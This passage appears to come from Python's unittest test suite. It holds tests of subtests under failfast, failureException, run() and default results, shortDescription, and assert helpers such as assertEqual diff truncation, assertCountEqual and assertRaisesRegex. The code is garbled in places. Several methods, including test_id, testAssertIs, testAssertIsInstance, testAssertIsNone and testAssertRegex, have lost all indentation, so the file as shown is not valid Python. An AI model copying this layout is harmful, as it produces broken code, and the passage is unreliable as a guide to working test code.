                            with self.subTest(j=j):
                                pass

        Foo(events).run(result)
        self.assertEqual(events, expected_events)
    def test_run_call_order__subtests_success(self):
        events = []
        result = LoggingResult(events)
        # The 6 subtest successes (4 inner + 2 outer) are individually
        # recorded, in addition to the whole test success.
        expected = (['startTest', 'setUp', 'test', 'tearDown']
                    + 6 * ['addSubTestSuccess']
                    + ['addSuccess', 'stopTest'])
        self._check_call_order__subtests_success(result, events, expected)
    def test_run_call_order__subtests_success_legacy(self):
        # With a legacy result, only the whole test success is recorded.
        events = []
        result = LegacyLoggingResult(events)
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addSuccess', 'stopTest']
        self._check_call_order__subtests_success(result, events, expected)
    def test_run_call_order__subtests_failfast(self):
        events = []
        result = LoggingResult(events)
        result.failfast = True

        class Foo(Test.LoggingTestCase):
            def test(self):
                super(Foo, self).test()
                with self.subTest(i=1):
                    self.fail('failure')
                with self.subTest(i=2):
                    self.fail('failure')
                self.fail('failure')

        # With failfast, execution stops after the first subtest failure:
        # only one addSubTestFailure is recorded.
        expected = ['startTest', 'setUp', 'test', 'tearDown',
                    'addSubTestFailure', 'stopTest']
        Foo(events).run(result)
        self.assertEqual(events, expected)
    def test_subtests_failfast(self):
        # Ensure proper test flow with subtests and failfast (issue #22894)
        events = []

        class Foo(unittest.TestCase):
            def test_a(self):
                with self.subTest():
                    events.append('a1')
                events.append('a2')

            def test_b(self):
                with self.subTest():
                    events.append('b1')
                with self.subTest():
                    self.fail('failure')
                # Never reached under failfast (the expected list below
                # confirms 'b2' is not appended).
                events.append('b2')

            def test_c(self):
                events.append('c')

        result = unittest.TestResult()
        result.failfast = True
        suite = unittest.makeSuite(Foo)
        suite.run(result)

        # test_b stops at the failing subtest and test_c never starts.
        expected = ['a1', 'a2', 'b1']
        self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework. The initial value of this
# attribute is AssertionError"
    def test_failureException__default(self):
        # The default failure exception is AssertionError.
        class Foo(unittest.TestCase):
            def test(self):
                pass

        self.assertIs(Foo('test').failureException, AssertionError)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
    def test_failureException__subclassing__explicit_raise(self):
        events = []
        result = LoggingResult(events)

        class Foo(unittest.TestCase):
            def test(self):
                raise RuntimeError()

            failureException = RuntimeError

        self.assertIs(Foo('test').failureException, RuntimeError)

        # Raising the designated failureException is reported as a
        # failure (addFailure), not an error.
        Foo('test').run(result)
        expected = ['startTest', 'addFailure', 'stopTest']
        self.assertEqual(events, expected)
# "This class attribute gives the exception raised by the test() method.
# If a test framework needs to use a specialized exception, possibly to
# carry additional information, it must subclass this exception in
# order to ``play fair'' with the framework."
#
# Make sure TestCase.run() respects the designated failureException
    def test_failureException__subclassing__implicit_raise(self):
        events = []
        result = LoggingResult(events)

        class Foo(unittest.TestCase):
            def test(self):
                self.fail("foo")

            failureException = RuntimeError

        self.assertIs(Foo('test').failureException, RuntimeError)

        # fail() raises the overridden failureException, so the run is
        # still recorded as a failure rather than an error.
        Foo('test').run(result)
        expected = ['startTest', 'addFailure', 'stopTest']
        self.assertEqual(events, expected)
# "The default implementation does nothing."
    def test_setUp(self):
        # The default setUp implementation does nothing.
        class Foo(unittest.TestCase):
            def runTest(self):
                pass

        # ... and nothing should happen
        Foo().setUp()
# "The default implementation does nothing."
    def test_tearDown(self):
        # The default tearDown implementation does nothing.
        class Foo(unittest.TestCase):
            def runTest(self):
                pass

        # ... and nothing should happen
        Foo().tearDown()
# "Return a string identifying the specific test case."
#
# Because of the vague nature of the docs, I'm not going to lock this
# test down too much. Really all that can be asserted is that the id()
# will be a string (either 8-byte or unicode -- again, because the docs
# just say "string")
def test_id(self):
class Foo(unittest.TestCase):
def runTest(self):
pass
self.assertIsInstance(Foo().id(), str)
    # "If result is omitted or None, a temporary result object is created,
    # used, and is made available to the caller. As TestCase owns the
    # temporary result startTestRun and stopTestRun are called."
    def test_run__uses_defaultTestResult(self):
        """run() with no result argument creates one via defaultTestResult()
        and drives startTestRun/stopTestRun on it itself."""
        events = []
        defaultResult = LoggingResult(events)
        class Foo(unittest.TestCase):
            def test(self):
                events.append('test')
            def defaultTestResult(self):
                return defaultResult
        # Make run() find a result object on its own
        result = Foo('test').run()
        self.assertIs(result, defaultResult)
        expected = ['startTestRun', 'startTest', 'test', 'addSuccess',
            'stopTest', 'stopTestRun']
        self.assertEqual(events, expected)
# "The result object is returned to run's caller"
    def test_run__returns_given_result(self):
        """run() returns the very result object it was given."""
        class Foo(unittest.TestCase):
            def test(self):
                pass
        result = unittest.TestResult()
        retval = Foo('test').run(result)
        self.assertIs(retval, result)
# "The same effect [as method run] may be had by simply calling the
# TestCase instance."
    def test_call__invoking_an_instance_delegates_to_run(self):
        """Calling a TestCase instance has the same effect as calling run()."""
        resultIn = unittest.TestResult()
        resultOut = unittest.TestResult()
        class Foo(unittest.TestCase):
            def test(self):
                pass
            # Intercept run() to verify __call__ forwards the argument
            # and propagates the return value.
            def run(self, result):
                self.assertIs(result, resultIn)
                return resultOut
        retval = Foo('test')(resultIn)
        self.assertIs(retval, resultOut)
    def testShortDescriptionWithoutDocstring(self):
        # Deliberately has no docstring: shortDescription() must return
        # None in that case (adding one here would break the test).
        self.assertIsNone(self.shortDescription())
    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testShortDescriptionWithOneLineDocstring(self):
        """Tests shortDescription() for a method with a docstring."""
        # shortDescription() should return this method's own (one-line)
        # docstring verbatim; the docstring text is load-bearing.
        self.assertEqual(
                self.shortDescription(),
                'Tests shortDescription() for a method with a docstring.')
    @unittest.skipIf(sys.flags.optimize >= 2,
                     "Docstrings are omitted with -O2 and above")
    def testShortDescriptionWithMultiLineDocstring(self):
        """Tests shortDescription() for a method with a longer docstring.
        This method ensures that only the first line of a docstring is
        returned used in the short description, no matter how long the
        whole thing is.
        """
        # Only the first docstring line should come back.
        self.assertEqual(
                self.shortDescription(),
                'Tests shortDescription() for a method with a longer '
                'docstring.')
    def testAddTypeEqualityFunc(self):
        """addTypeEqualityFunc() installs a per-type comparison that
        assertEqual() then consults instead of ==."""
        class SadSnake(object):
            """Dummy class for test_addTypeEqualityFunc."""
        s1, s2 = SadSnake(), SadSnake()
        self.assertFalse(s1 == s2)
        def AllSnakesCreatedEqual(a, b, msg=None):
            return type(a) == type(b) == SadSnake
        self.addTypeEqualityFunc(SadSnake, AllSnakesCreatedEqual)
        self.assertEqual(s1, s2)
        # No this doesn't clean up and remove the SadSnake equality func
        # from this TestCase instance but since its a local nothing else
        # will ever notice that.
def testAssertIs(self):
thing = object()
self.assertIs(thing, thing)
self.assertRaises(self.failureException, self.assertIs, thing, object())
def testAssertIsNot(self):
thing = object()
self.assertIsNot(thing, object())
self.assertRaises(self.failureException, self.assertIsNot, thing, thing)
def testAssertIsInstance(self):
thing = []
self.assertIsInstance(thing, list)
self.assertRaises(self.failureException, self.assertIsInstance,
thing, dict)
def testAssertNotIsInstance(self):
thing = []
self.assertNotIsInstance(thing, dict)
self.assertRaises(self.failureException, self.assertNotIsInstance,
thing, list)
    def testAssertIn(self):
        """assertIn/assertNotIn work on strings, sequences and dict keys."""
        animals = {'monkey': 'banana', 'cow': 'grass', 'seal': 'fish'}
        self.assertIn('a', 'abc')
        self.assertIn(2, [1, 2, 3])
        self.assertIn('monkey', animals)
        self.assertNotIn('d', 'abc')
        self.assertNotIn(0, [1, 2, 3])
        self.assertNotIn('otter', animals)
        self.assertRaises(self.failureException, self.assertIn, 'x', 'abc')
        self.assertRaises(self.failureException, self.assertIn, 4, [1, 2, 3])
        self.assertRaises(self.failureException, self.assertIn, 'elephant',
                          animals)
        self.assertRaises(self.failureException, self.assertNotIn, 'c', 'abc')
        self.assertRaises(self.failureException, self.assertNotIn, 1, [1, 2, 3])
        self.assertRaises(self.failureException, self.assertNotIn, 'cow',
                          animals)
    def testAssertDictContainsSubset(self):
        """The deprecated assertDictContainsSubset accepts true subsets and
        rejects missing keys or mismatched values."""
        # The method is deprecated, so silence its DeprecationWarning here.
        with warnings.catch_warnings():
            warnings.simplefilter("ignore", DeprecationWarning)
            self.assertDictContainsSubset({}, {})
            self.assertDictContainsSubset({}, {'a': 1})
            self.assertDictContainsSubset({'a': 1}, {'a': 1})
            self.assertDictContainsSubset({'a': 1}, {'a': 1, 'b': 2})
            self.assertDictContainsSubset({'a': 1, 'b': 2}, {'a': 1, 'b': 2})
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({1: "one"}, {})
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({'a': 2}, {'a': 1})
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({'c': 1}, {'a': 1})
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({'a': 1, 'c': 1}, {'a': 1})
            one = ''.join(chr(i) for i in range(255))
            # this used to cause a UnicodeDecodeError constructing the failure msg
            with self.assertRaises(self.failureException):
                self.assertDictContainsSubset({'foo': one}, {'foo': '\uFFFD'})
    def testAssertEqual(self):
        """assertEqual passes for equal pairs (with every msg form) and
        raises failureException for unequal pairs."""
        equal_pairs = [
                ((), ()),
                ({}, {}),
                ([], []),
                (set(), set()),
                (frozenset(), frozenset())]
        for a, b in equal_pairs:
            # This mess of try excepts is to test the assertEqual behavior
            # itself.
            try:
                self.assertEqual(a, b)
            except self.failureException:
                self.fail('assertEqual(%r, %r) failed' % (a, b))
            try:
                self.assertEqual(a, b, msg='foo')
            except self.failureException:
                self.fail('assertEqual(%r, %r) with msg= failed' % (a, b))
            try:
                self.assertEqual(a, b, 'foo')
            except self.failureException:
                self.fail('assertEqual(%r, %r) with third parameter failed' %
                          (a, b))

        unequal_pairs = [
               ((), []),
               ({}, set()),
               (set([4,1]), frozenset([4,2])),
               (frozenset([4,5]), set([2,3])),
               (set([3,4]), set([5,4]))]
        for a, b in unequal_pairs:
            self.assertRaises(self.failureException, self.assertEqual, a, b)
            self.assertRaises(self.failureException, self.assertEqual, a, b,
                              'foo')
            self.assertRaises(self.failureException, self.assertEqual, a, b,
                              msg='foo')
    def testEquality(self):
        """assertListEqual/assertTupleEqual/assertSequenceEqual/assertDictEqual
        accept equal containers and reject unequal or wrongly-typed ones."""
        self.assertListEqual([], [])
        self.assertTupleEqual((), ())
        self.assertSequenceEqual([], ())

        a = [0, 'a', []]
        b = []
        self.assertRaises(unittest.TestCase.failureException,
                          self.assertListEqual, a, b)
        self.assertRaises(unittest.TestCase.failureException,
                          self.assertListEqual, tuple(a), tuple(b))
        self.assertRaises(unittest.TestCase.failureException,
                          self.assertSequenceEqual, a, tuple(b))

        b.extend(a)
        self.assertListEqual(a, b)
        self.assertTupleEqual(tuple(a), tuple(b))
        # assertSequenceEqual is type-agnostic; the type-specific variants
        # below must reject a list/tuple mix even when the contents match.
        self.assertSequenceEqual(a, tuple(b))
        self.assertSequenceEqual(tuple(a), b)

        self.assertRaises(self.failureException, self.assertListEqual,
                          a, tuple(b))
        self.assertRaises(self.failureException, self.assertTupleEqual,
                          tuple(a), b)
        self.assertRaises(self.failureException, self.assertListEqual, None, b)
        self.assertRaises(self.failureException, self.assertTupleEqual, None,
                          tuple(b))
        self.assertRaises(self.failureException, self.assertSequenceEqual,
                          None, tuple(b))
        self.assertRaises(self.failureException, self.assertListEqual, 1, 1)
        self.assertRaises(self.failureException, self.assertTupleEqual, 1, 1)
        self.assertRaises(self.failureException, self.assertSequenceEqual,
                          1, 1)

        self.assertDictEqual({}, {})

        c = { 'x': 1 }
        d = {}
        self.assertRaises(unittest.TestCase.failureException,
                          self.assertDictEqual, c, d)

        d.update(c)
        self.assertDictEqual(c, d)

        d['x'] = 0
        self.assertRaises(unittest.TestCase.failureException,
                          self.assertDictEqual, c, d, 'These are unequal')

        self.assertRaises(self.failureException, self.assertDictEqual, None, d)
        self.assertRaises(self.failureException, self.assertDictEqual, [], d)
        self.assertRaises(self.failureException, self.assertDictEqual, 1, 1)
    def testAssertSequenceEqualMaxDiff(self):
        """maxDiff bounds the diff in assertSequenceEqual failure messages:
        below the bound the diff is truncated with a DIFF_OMITTED marker,
        above it (or with maxDiff=None) the full diff is included."""
        self.assertEqual(self.maxDiff, 80*8)
        seq1 = 'a' + 'x' * 80**2
        seq2 = 'b' + 'x' * 80**2
        diff = '\n'.join(difflib.ndiff(pprint.pformat(seq1).splitlines(),
                                       pprint.pformat(seq2).splitlines()))
        # the +1 is the leading \n added by assertSequenceEqual
        omitted = unittest.case.DIFF_OMITTED % (len(diff) + 1,)

        self.maxDiff = len(diff)//2
        try:
            self.assertSequenceEqual(seq1, seq2)
        except self.failureException as e:
            msg = e.args[0]
        else:
            self.fail('assertSequenceEqual did not fail.')
        self.assertLess(len(msg), len(diff))
        self.assertIn(omitted, msg)

        self.maxDiff = len(diff) * 2
        try:
            self.assertSequenceEqual(seq1, seq2)
        except self.failureException as e:
            msg = e.args[0]
        else:
            self.fail('assertSequenceEqual did not fail.')
        self.assertGreater(len(msg), len(diff))
        self.assertNotIn(omitted, msg)

        # maxDiff = None disables truncation entirely.
        self.maxDiff = None
        try:
            self.assertSequenceEqual(seq1, seq2)
        except self.failureException as e:
            msg = e.args[0]
        else:
            self.fail('assertSequenceEqual did not fail.')
        self.assertGreater(len(msg), len(diff))
        self.assertNotIn(omitted, msg)
    def testTruncateMessage(self):
        """_truncateMessage drops the diff when it exceeds maxDiff and
        appends it unchanged when maxDiff is None or large enough."""
        self.maxDiff = 1
        message = self._truncateMessage('foo', 'bar')
        omitted = unittest.case.DIFF_OMITTED % len('bar')
        self.assertEqual(message, 'foo' + omitted)

        self.maxDiff = None
        message = self._truncateMessage('foo', 'bar')
        self.assertEqual(message, 'foobar')

        self.maxDiff = 4
        message = self._truncateMessage('foo', 'bar')
        self.assertEqual(message, 'foobar')
    def testAssertDictEqualTruncates(self):
        """assertDictEqual routes its failure message through _truncateMessage."""
        test = unittest.TestCase('assertEqual')
        # Stub out truncation so its use is observable in the message.
        def truncate(msg, diff):
            return 'foo'
        test._truncateMessage = truncate
        try:
            test.assertDictEqual({}, {1: 0})
        except self.failureException as e:
            self.assertEqual(str(e), 'foo')
        else:
            self.fail('assertDictEqual did not fail')
    def testAssertMultiLineEqualTruncates(self):
        """assertMultiLineEqual routes its failure message through _truncateMessage."""
        test = unittest.TestCase('assertEqual')
        # Stub out truncation so its use is observable in the message.
        def truncate(msg, diff):
            return 'foo'
        test._truncateMessage = truncate
        try:
            test.assertMultiLineEqual('foo', 'bar')
        except self.failureException as e:
            self.assertEqual(str(e), 'foo')
        else:
            self.fail('assertMultiLineEqual did not fail')
    def testAssertEqual_diffThreshold(self):
        """Strings shorter than _diffThreshold get a difflib diff (with '^'
        markers); longer ones get a plain '%r != %r' message, skipping
        difflib and _truncateMessage entirely."""
        # check threshold value
        self.assertEqual(self._diffThreshold, 2**16)
        # disable maxDiff to get diff markers
        self.maxDiff = None
        # set a lower threshold value and add a cleanup to restore it
        old_threshold = self._diffThreshold
        self._diffThreshold = 2**5
        self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))

        # under the threshold: diff marker (^) in error message
        s = 'x' * (2**4)
        with self.assertRaises(self.failureException) as cm:
            self.assertEqual(s + 'a', s + 'b')
        self.assertIn('^', str(cm.exception))
        self.assertEqual(s + 'a', s + 'a')

        # over the threshold: diff not used and marker (^) not in error message
        s = 'x' * (2**6)
        # if the path that uses difflib is taken, _truncateMessage will be
        # called -- replace it with explodingTruncation to verify that this
        # doesn't happen
        def explodingTruncation(message, diff):
            raise SystemError('this should not be raised')
        old_truncate = self._truncateMessage
        self._truncateMessage = explodingTruncation
        self.addCleanup(lambda: setattr(self, '_truncateMessage', old_truncate))

        s1, s2 = s + 'a', s + 'b'
        with self.assertRaises(self.failureException) as cm:
            self.assertEqual(s1, s2)
        self.assertNotIn('^', str(cm.exception))
        self.assertEqual(str(cm.exception), '%r != %r' % (s1, s2))
        self.assertEqual(s + 'a', s + 'a')
    def testAssertEqual_shorten(self):
        """With _diffThreshold 0, assertEqual shortens long common prefixes
        and suffixes in its message using '[N chars]' placeholders."""
        # set a lower threshold value and add a cleanup to restore it
        old_threshold = self._diffThreshold
        self._diffThreshold = 0
        self.addCleanup(lambda: setattr(self, '_diffThreshold', old_threshold))

        s = 'x' * 100
        s1, s2 = s + 'a', s + 'b'
        with self.assertRaises(self.failureException) as cm:
            self.assertEqual(s1, s2)
        c = 'xxxx[35 chars]' + 'x' * 61
        self.assertEqual(str(cm.exception), "'%sa' != '%sb'" % (c, c))
        self.assertEqual(s + 'a', s + 'a')

        p = 'y' * 50
        s1, s2 = s + 'a' + p, s + 'b' + p
        with self.assertRaises(self.failureException) as cm:
            self.assertEqual(s1, s2)
        c = 'xxxx[85 chars]xxxxxxxxxxx'
        self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, p, c, p))

        p = 'y' * 100
        s1, s2 = s + 'a' + p, s + 'b' + p
        with self.assertRaises(self.failureException) as cm:
            self.assertEqual(s1, s2)
        c = 'xxxx[91 chars]xxxxx'
        d = 'y' * 40 + '[56 chars]yyyy'
        self.assertEqual(str(cm.exception), "'%sa%s' != '%sb%s'" % (c, d, c, d))
    def testAssertCountEqual(self):
        """assertCountEqual compares element multiplicity regardless of
        order, for hashable, unhashable and unorderable elements alike."""
        a = object()
        self.assertCountEqual([1, 2, 3], [3, 2, 1])
        self.assertCountEqual(['foo', 'bar', 'baz'], ['bar', 'baz', 'foo'])
        self.assertCountEqual([a, a, 2, 2, 3], (a, 2, 3, a, 2))
        self.assertCountEqual([1, "2", "a", "a"], ["a", "2", True, "a"])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [1, 2] + [3] * 100, [1] * 100 + [2, 3])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [1, "2", "a", "a"], ["a", "2", True, 1])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [10], [10, 11])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [10, 11], [10])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [10, 11, 10], [10, 11])

        # Test that sequences of unhashable objects can be tested for sameness:
        self.assertCountEqual([[1, 2], [3, 4], 0], [False, [3, 4], [1, 2]])
        # Test that iterator of unhashable objects can be tested for sameness:
        self.assertCountEqual(iter([1, 2, [], 3, 4]),
                              iter([1, 2, [], 3, 4]))

        # hashable types, but not orderable
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [], [divmod, 'x', 1, 5j, 2j, frozenset()])
        # comparing dicts
        self.assertCountEqual([{'a': 1}, {'b': 2}], [{'b': 2}, {'a': 1}])
        # comparing heterogenous non-hashable sequences
        self.assertCountEqual([1, 'x', divmod, []], [divmod, [], 'x', 1])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [], [divmod, [], 'x', 1, 5j, 2j, set()])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [[1]], [[2]])

        # Same elements, but not same sequence length
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [1, 1, 2], [2, 1])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [1, 1, "2", "a", "a"], ["2", "2", True, "a"])
        self.assertRaises(self.failureException, self.assertCountEqual,
                          [1, {'b': 2}, None, True], [{'b': 2}, True, None])

        # Same elements which don't reliably compare, in
        # different order, see issue 10242
        a = [{2,4}, {1,2}]
        b = a[::-1]
        self.assertCountEqual(a, b)

        # test utility functions supporting assertCountEqual()
        diffs = set(unittest.util._count_diff_all_purpose('aaabccd', 'abbbcce'))
        expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
        self.assertEqual(diffs, expected)

        diffs = unittest.util._count_diff_all_purpose([[]], [])
        self.assertEqual(diffs, [(1, 0, [])])

        diffs = set(unittest.util._count_diff_hashable('aaabccd', 'abbbcce'))
        expected = {(3,1,'a'), (1,3,'b'), (1,0,'d'), (0,1,'e')}
        self.assertEqual(diffs, expected)
    def testAssertSetEqual(self):
        """assertSetEqual accepts equal set/frozenset pairs and rejects
        unequal sets and non-set operands."""
        set1 = set()
        set2 = set()
        self.assertSetEqual(set1, set2)

        self.assertRaises(self.failureException, self.assertSetEqual, None, set2)
        self.assertRaises(self.failureException, self.assertSetEqual, [], set2)
        self.assertRaises(self.failureException, self.assertSetEqual, set1, None)
        self.assertRaises(self.failureException, self.assertSetEqual, set1, [])

        set1 = set(['a'])
        set2 = set()
        self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)

        set1 = set(['a'])
        set2 = set(['a'])
        self.assertSetEqual(set1, set2)

        set1 = set(['a'])
        set2 = set(['a', 'b'])
        self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)

        set1 = set(['a'])
        set2 = frozenset(['a', 'b'])
        self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)

        # set vs frozenset with equal contents compares equal
        set1 = set(['a', 'b'])
        set2 = frozenset(['a', 'b'])
        self.assertSetEqual(set1, set2)

        set1 = set()
        set2 = "foo"
        self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
        self.assertRaises(self.failureException, self.assertSetEqual, set2, set1)

        # make sure any string formatting is tuple-safe
        set1 = set([(0, 1), (2, 3)])
        set2 = set([(4, 5)])
        self.assertRaises(self.failureException, self.assertSetEqual, set1, set2)
    def testInequality(self):
        """assertGreater/GreaterEqual/Less/LessEqual behave correctly for
        ints, floats, strings and bytes."""
        # Try ints
        self.assertGreater(2, 1)
        self.assertGreaterEqual(2, 1)
        self.assertGreaterEqual(1, 1)
        self.assertLess(1, 2)
        self.assertLessEqual(1, 2)
        self.assertLessEqual(1, 1)
        self.assertRaises(self.failureException, self.assertGreater, 1, 2)
        self.assertRaises(self.failureException, self.assertGreater, 1, 1)
        self.assertRaises(self.failureException, self.assertGreaterEqual, 1, 2)
        self.assertRaises(self.failureException, self.assertLess, 2, 1)
        self.assertRaises(self.failureException, self.assertLess, 1, 1)
        self.assertRaises(self.failureException, self.assertLessEqual, 2, 1)

        # Try Floats
        self.assertGreater(1.1, 1.0)
        self.assertGreaterEqual(1.1, 1.0)
        self.assertGreaterEqual(1.0, 1.0)
        self.assertLess(1.0, 1.1)
        self.assertLessEqual(1.0, 1.1)
        self.assertLessEqual(1.0, 1.0)
        self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.1)
        self.assertRaises(self.failureException, self.assertGreater, 1.0, 1.0)
        self.assertRaises(self.failureException, self.assertGreaterEqual, 1.0, 1.1)
        self.assertRaises(self.failureException, self.assertLess, 1.1, 1.0)
        self.assertRaises(self.failureException, self.assertLess, 1.0, 1.0)
        self.assertRaises(self.failureException, self.assertLessEqual, 1.1, 1.0)

        # Try Strings
        self.assertGreater('bug', 'ant')
        self.assertGreaterEqual('bug', 'ant')
        self.assertGreaterEqual('ant', 'ant')
        self.assertLess('ant', 'bug')
        self.assertLessEqual('ant', 'bug')
        self.assertLessEqual('ant', 'ant')
        self.assertRaises(self.failureException, self.assertGreater, 'ant', 'bug')
        self.assertRaises(self.failureException, self.assertGreater, 'ant', 'ant')
        self.assertRaises(self.failureException, self.assertGreaterEqual, 'ant', 'bug')
        self.assertRaises(self.failureException, self.assertLess, 'bug', 'ant')
        self.assertRaises(self.failureException, self.assertLess, 'ant', 'ant')
        self.assertRaises(self.failureException, self.assertLessEqual, 'bug', 'ant')

        # Try bytes
        self.assertGreater(b'bug', b'ant')
        self.assertGreaterEqual(b'bug', b'ant')
        self.assertGreaterEqual(b'ant', b'ant')
        self.assertLess(b'ant', b'bug')
        self.assertLessEqual(b'ant', b'bug')
        self.assertLessEqual(b'ant', b'ant')
        self.assertRaises(self.failureException, self.assertGreater, b'ant', b'bug')
        self.assertRaises(self.failureException, self.assertGreater, b'ant', b'ant')
        self.assertRaises(self.failureException, self.assertGreaterEqual, b'ant',
                          b'bug')
        self.assertRaises(self.failureException, self.assertLess, b'bug', b'ant')
        self.assertRaises(self.failureException, self.assertLess, b'ant', b'ant')
        self.assertRaises(self.failureException, self.assertLessEqual, b'bug', b'ant')
    def testAssertMultiLineEqual(self):
        """assertMultiLineEqual produces the expected ndiff-style message.

        NOTE(review): the embedded expected-diff string is whitespace-exact
        ('?' marker columns must line up) — do not reflow it.
        """
        sample_text = """\
http://www.python.org/doc/2.3/lib/module-unittest.html
test case
    A test case is the smallest unit of testing. [...]
"""
        revised_sample_text = """\
http://www.python.org/doc/2.4.1/lib/module-unittest.html
test case
    A test case is the smallest unit of testing. [...] You may provide your
    own implementation that does not subclass from TestCase, of course.
"""
        sample_text_error = """\
- http://www.python.org/doc/2.3/lib/module-unittest.html
?                     ^
+ http://www.python.org/doc/2.4.1/lib/module-unittest.html
?                     ^^^
  test case
-     A test case is the smallest unit of testing. [...]
+     A test case is the smallest unit of testing. [...] You may provide your
?                                                       +++++++++++++++++++++
+     own implementation that does not subclass from TestCase, of course.
"""
        self.maxDiff = None
        try:
            self.assertMultiLineEqual(sample_text, revised_sample_text)
        except self.failureException as e:
            # need to remove the first line of the error message
            error = str(e).split('\n', 1)[1]

            # no fair testing ourself with ourself, and assertEqual is used for strings
            # so can't use assertEqual either. Just use assertTrue.
            self.assertTrue(sample_text_error == error)
    def testAsertEqualSingleLine(self):
        """Single-line string inequality gets a character-level diff message.

        NOTE(review): method name has a typo ('Asert'); still discovered by
        the 'test' prefix, so left unchanged to keep the interface stable.
        The expected-diff string below is whitespace-exact — do not reflow.
        """
        sample_text = "laden swallows fly slowly"
        revised_sample_text = "unladen swallows fly quickly"
        sample_text_error = """\
- laden swallows fly slowly
?                    ^^^^
+ unladen swallows fly quickly
? ++                 ^^^^^
"""
        try:
            self.assertEqual(sample_text, revised_sample_text)
        except self.failureException as e:
            # need to remove the first line of the error message
            error = str(e).split('\n', 1)[1]
            self.assertTrue(sample_text_error == error)
def testAssertIsNone(self):
self.assertIsNone(None)
self.assertRaises(self.failureException, self.assertIsNone, False)
self.assertIsNotNone('DjZoPloGears on Rails')
self.assertRaises(self.failureException, self.assertIsNotNone, None)
def testAssertRegex(self):
self.assertRegex('asdfabasdf', r'ab+')
self.assertRaises(self.failureException, self.assertRegex,
'saaas', r'aaaa')
    def testAssertRaisesRegex(self):
        """assertRaisesRegex accepts either a compiled pattern or a string."""
        class ExceptionMock(Exception):
            pass

        def Stub():
            raise ExceptionMock('We expect')

        self.assertRaisesRegex(ExceptionMock, re.compile('expect$'), Stub)
        self.assertRaisesRegex(ExceptionMock, 'expect$', Stub)
    def testAssertNotRaisesRegex(self):
        """assertRaisesRegex fails with 'not raised by <callable>' when the
        callable does not raise at all."""
        self.assertRaisesRegex(
                self.failureException, '^Exception not raised by <lambda>$',
                self.assertRaisesRegex, Exception, re.compile('x'),
                lambda: None)
        self.assertRaisesRegex(
                self.failureException, '^Exception not raised by <lambda>$',
                self.assertRaisesRegex, Exception, 'x',
                lambda: None)
    def testAssertRaisesRegexInvalidRegex(self):
        """Passing a non-regex (a callable) as the pattern raises TypeError."""
        # Issue 20145.
        class MyExc(Exception):
            pass
        self.assertRaises(TypeError, self.assertRaisesRegex, MyExc, lambda: True)
    def testAssertWarnsRegexInvalidRegex(self):
        """Passing a non-regex (a callable) as the pattern raises TypeError."""
        # Issue 20145.
        class MyWarn(Warning):
            pass
        self.assertRaises(TypeError, self.assertWarnsRegex, MyWarn, lambda: True)
    def testAssertRaisesRegexMismatch(self):
        """A raised-but-unmatched message fails with a 'does not match' error,
        for both string and compiled patterns."""
        def Stub():
            raise Exception('Unexpected')

        self.assertRaisesRegex(
                self.failureException,
                r'"\^Expected\$" does not match "Unexpected"',
                self.assertRaisesRegex, Exception, '^Expected$',
                Stub)
        self.assertRaisesRegex(
                self.failureException,
                r'"\^Expected\$" does not match "Unexpected"',
                self.assertRaisesRegex, Exception,
                re.compile('^Expected$'), Stub)
    def testAssertRaisesExcValue(self):
        """The assertRaises context manager exposes the caught exception
        instance via its .exception attribute."""
        class ExceptionMock(Exception):
            pass

        def Stub(foo):
            raise ExceptionMock(foo)
        v = "particular value"

        ctx = self.assertRaises(ExceptionMock)
        with ctx:
            Stub(v)
        e = ctx.exception
        self.assertIsInstance(e, ExceptionMock)
        self.assertEqual(e.args[0], v)
    def testAssertWarnsCallable(self):
        """assertWarns (callable form) passes on the expected warning class
        (or a tuple of classes), fails when nothing or something else is
        warned, and leaves unrelated warning filters untouched."""
        def _runtime_warn():
            warnings.warn("foo", RuntimeWarning)
        # Success when the right warning is triggered, even several times
        self.assertWarns(RuntimeWarning, _runtime_warn)
        self.assertWarns(RuntimeWarning, _runtime_warn)
        # A tuple of warning classes is accepted
        self.assertWarns((DeprecationWarning, RuntimeWarning), _runtime_warn)
        # *args and **kwargs also work
        self.assertWarns(RuntimeWarning,
                         warnings.warn, "foo", category=RuntimeWarning)
        # Failure when no warning is triggered
        with self.assertRaises(self.failureException):
            self.assertWarns(RuntimeWarning, lambda: 0)
        # Failure when another warning is triggered
        with warnings.catch_warnings():
            # Force default filter (in case tests are run with -We)
            warnings.simplefilter("default", RuntimeWarning)
            with self.assertRaises(self.failureException):
                self.assertWarns(DeprecationWarning, _runtime_warn)
        # Filters for other warnings are not modified
        with warnings.catch_warnings():
            warnings.simplefilter("error", RuntimeWarning)
            with self.assertRaises(RuntimeWarning):
                self.assertWarns(DeprecationWarning, _runtime_warn)
    def testAssertWarnsContext(self):
        """assertWarns as a context manager: same cases as the callable form,
        plus the cm exposes .warning, .filename and .lineno.

